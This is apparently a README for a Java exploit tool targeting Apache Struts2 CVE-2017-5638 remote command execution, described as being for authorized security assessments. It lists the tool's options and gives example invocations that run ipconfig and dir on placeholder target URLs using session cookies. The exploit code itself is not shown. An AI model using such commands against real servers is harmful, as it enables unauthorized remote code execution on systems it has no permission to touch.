
Apache Struts2 CVE-2017-5638用のJavaベースのエクスプロイト。巧妙に細工されたHTTPヘッダーを介して任意のコマンドを実行する。許可されたセキュリティ評価を目的としている。
これは、https://www.exploit-db.com/exploits/41570/ にあるPythonエクスプロイトのJava移植版です。
このソフトウェアは外部依存関係を持たないように書かれています。
このツールは、セキュリティエンジニアやアプリケーションセキュリティ担当者がセキュリティ評価を行うために意図されています。このツールは責任を持って使用してください。このアプリケーションの使用方法について、私は一切責任を負いません。このツールの使用によって引き起こされた損害や、犯された犯罪についても、私は一切責任を負いません。
Usage:
java -jar struts2_cve-2017-5638.jar [options]
Description:
Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
--cookies [cookies]
Optional. Cookies passed into the request, i.e. authentication cookies.
-v, --verbose
Optional. Increase verbosity.
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
このプロジェクトはMITライセンスの下でライセンスされています - 詳細は LICENSE.txt ファイルを参照してください。